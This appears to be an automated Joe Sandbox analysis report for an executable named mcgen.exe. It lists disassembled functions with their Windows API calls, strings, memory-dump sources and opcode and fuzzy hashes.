Instruction ID: a8324cd0e0548c2e6b74b91b8579d47fabab963f189ee1f4fd30827c9273d705
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 9D31C3A1619AE145EB218F29A4503EA639CEB95BF1F040231EB6D87BD9DF2CD6418780

Function 00007FF6B9F12810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6B9F128EA

Strings

Error, xrefs: 00007FF6B9F128DD
[PYI-%d:%ls] , xrefs: 00007FF6B9F12868
ERROR, xrefs: 00007FF6B9F1286F

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: 2fd1ce9a36ea350c97d4939d8841495dd57c66f93e131115a6aebf42dc828c11
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: F5219F62B08B9182E7209F69F4447EA73A8EB887D5F404136EB8D93655DF3CD255C740

Function 00007FF6B9F2C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6B9F2C68F
WriteFile.KERNEL32 ref: 00007FF6B9F2C957
WriteFile.KERNEL32 ref: 00007FF6B9F2C99D
GetLastError.KERNEL32 ref: 00007FF6B9F2CA53

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 50feccd6c05a4dda130df4aad892f7eb55500bac582b6a517a05cae281b17841
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: CDD11172B18A818AE710CF79D4402AC37B9FB457E9B048276EF5E97B99DE38D016C740

Function 00007FF6B9F2F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6B9F2FAEC
_get_daylight.LIBCMT ref: 00007FF6B9F2FAFD
_get_daylight.LIBCMT ref: 00007FF6B9F2FB0E
_isindst.LIBCMT ref: 00007FF6B9F2FBD9

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 5834c40d2647249fc6be9b9000b3b76786558968647ce732260587ffcff6f366
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 9951F7B2F1815286EB24CF2899517BC3769AB4437AF614135EF1ED3AE5DF3CA4018700

Function 00007FF6B9F257EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6B9F2581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF6B9F25881
GetLastError.KERNEL32 ref: 00007FF6B9F25912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B9F25724), ref: 00007FF6B9F2595E

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 3d35e242d57b329af3b75996e29cd07e78d9e1602afcd05e9f976d1c5575697c
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 65518B22E186818AFB10DFB9D4503BD33A9BB48BAAF148435EF4D9B689DF3CD4458701

Function 00007FF6B9F120C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6B9F120F4
SetWindowLongPtrW.USER32 ref: 00007FF6B9F12116
GetWindowLongPtrW.USER32 ref: 00007FF6B9F12140
InvalidateRect.USER32 ref: 00007FF6B9F12160

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 144a1e1054ebc6512705b1cdb37674be7e47d73d170723f9825057f001374756
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 1D112961B0C16282FA588FBEE5442F91255EB857E2F548030DB4943B99CD2DD4C08244

Function 00007FF6B9F35B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B9F317D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F31803

_get_daylight.LIBCMT ref: 00007FF6B9F35CA4
_get_daylight.LIBCMT ref: 00007FF6B9F35CB5

Strings

?, xrefs: 00007FF6B9F35C35

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 326c804f9ed91e212e193face0bc717c0d54ada3775640560c011b1c09c7000b
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: F841F222A1C68246FB749F39A40137A66A8EBC0BFAF144235EF5C87AD5DE3CD481C701

Function 00007FF6B9F29084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F290B6

Part of subcall function 00007FF6B9F2A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
Part of subcall function 00007FF6B9F2A9B8: GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6B9F1CC15), ref: 00007FF6B9F290D4

Strings

C:\Users\user\Desktop\mcgen.exe, xrefs: 00007FF6B9F290C2

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\mcgen.exe
API String ID: 3580290477-1592112586
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: 6af4073ac59bd0a823662f74e2229b8f1a017ed0249755092404b8d909520134
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: 72419336A08B9686EB14DF2AA5502BC7798FF447E1B558035FB4D83B96DF3CE4818340

Function 00007FF6B9F2CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6B9F2CDBF
GetLastError.KERNEL32 ref: 00007FF6B9F2CDE1

Strings

U, xrefs: 00007FF6B9F2CD6B

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 39120bcc615643187dfe85dabb80f2d62d89841071a4c5f70367bdffee845544
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 81418F72A18B8581DB208F29E8443A97768FB987A5F844135EB4DC7B98EF3CD441CB40

Function 00007FF6B9F2F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B9F2F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B9F2F6BA

Strings

:, xrefs: 00007FF6B9F2F67E

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: 6457545dadfc2f7c1521202a3a2a400a52e6d4f8885a859d1e4ac2a350bf8dec
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: BA21D5A2A182C182FB209F19D05427D73B9FB84B59FA54035E78D83694DF7CD5458B41

Function 00007FF6B9F1FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6B9F1FE08
RaiseException.KERNEL32 ref: 00007FF6B9F1FE49

Strings

csm, xrefs: 00007FF6B9F1FE36

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 492c609f12f35da35d619d08c5e28ef130d6ea5b87879ba3c471e621a8288ac2
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 51115E32608B9182EB218F29F40026977E4FB88BA5F684234DF8D47755DF3CC9518B40

Function 00007FF6B9F307AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F307DC
GetDriveTypeW.KERNEL32 ref: 00007FF6B9F3081C

Strings

:, xrefs: 00007FF6B9F30805

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 56a018d703fd0a684fe754a5d441f691186667da3ab274935f858053ab2bff23
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: D2017C2291C24286FB30AF68946627E73A8EF8576AF841036E75DC3691DF3CE544CA19

Analysis Process: mcgen.exePID: 7020, Parent PID: 3212COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	228
Total number of Limit Nodes:	48

Executed Functions

Function 00007FFD940E92C0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940E938F
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940E946E
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940E9490
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940E964E
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940E9677

Strings

immutable, xrefs: 00007FFD940E980D
-journal, xrefs: 00007FFD940E9656
nolock, xrefs: 00007FFD940E97D5

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: -journal$immutable$nolock
API String ID: 4157932375-4201244970
Opcode ID: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
Instruction ID: a2ed56f4cc1cb4501718129f39d65cd3793d7d1be23224a57ab268a4df490380
Opcode Fuzzy Hash: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
Instruction Fuzzy Hash: A9329122B0978286EB759F6594A037E37A0FF46B94F088235CA5E07796EF3DE465D300

Function 00007FFD9414CFB0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD9414D627

Strings

%s at line %d of [%.10s], xrefs: 00007FFD9414D02E
invalid, xrefs: 00007FFD9414CFF2
misuse, xrefs: 00007FFD9414D022
unopened, xrefs: 00007FFD9414CFFD
NULL, xrefs: 00007FFD9414CFDD
API call with %s database connection pointer, xrefs: 00007FFD9414D004
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFD9414D015

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 4157932375-509082904
Opcode ID: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
Instruction ID: def1fc5f6b9cc57c489c49f2b9477d8f08b7e66a81f0e3f6ecee04afb4e89ce1
Opcode Fuzzy Hash: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
Instruction Fuzzy Hash: 6D129922B19B4285EE749FA1A4F037967A1BF86B88F188135DE4E1779ACF3DE445C300

Function 00007FF6B9F369D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B9F36708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F36749
Part of subcall function 00007FF6B9F36708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F367C7
Part of subcall function 00007FF6B9F36708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F36818

CreateFileW.KERNEL32 ref: 00007FF6B9F36ADA
CreateFileW.KERNEL32 ref: 00007FF6B9F36B2A
GetLastError.KERNEL32 ref: 00007FF6B9F36B5A
GetFileType.KERNEL32 ref: 00007FF6B9F36B6F
GetLastError.KERNEL32 ref: 00007FF6B9F36B79
CloseHandle.KERNEL32 ref: 00007FF6B9F36BAC
CloseHandle.KERNEL32 ref: 00007FF6B9F36D0F
CreateFileW.KERNEL32 ref: 00007FF6B9F36D44
GetLastError.KERNEL32 ref: 00007FF6B9F36D53

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 3a7869cc3003580e969181492753bc0c8568c4aa9f79d8b235a2c8f0c9486d47
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 1EC1AE36B28A4585EB20DFB9C4912BC3769FB49BA9B115229DB2E9B7D4CF3CD451C300

Function 00007FFD94154CF0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD94154F7D
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD9415502E

Strings

database schema is locked: %s, xrefs: 00007FFD94154ED6
statement too long, xrefs: 00007FFD94154F33
out of memory, xrefs: 00007FFD94154DDF

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 4157932375-1046679716
Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction ID: 5315c26b716a261e3afa3ba57158ef40f46152ec771cf8ba07c5015e7860bf37
Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction Fuzzy Hash: 5BF16223B0C68186EB359FA594A43FA7BA0FB86B48F198135DA4D1779ADF7CE441C700

Function 00007FFD948A5DD0 Relevance: 6.9, APIs: 4, Instructions: 900librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFD948A68F9
GetProcAddress.KERNEL32 ref: 00007FFD948A6923
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFD948A69AD
VirtualProtect.KERNEL32 ref: 00007FFD948A69CB

Memory Dump Source

Source File: 00000002.00000002.2536268367.00007FFD948A5000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFD94250000, based on PE: true

Associated: 00000002.00000002.2535216622.00007FFD94250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94251000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94527000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94536000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94540000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94582000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94651000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD9475D000.00000040.00000001.01000000.00000004.sdmpDownload File
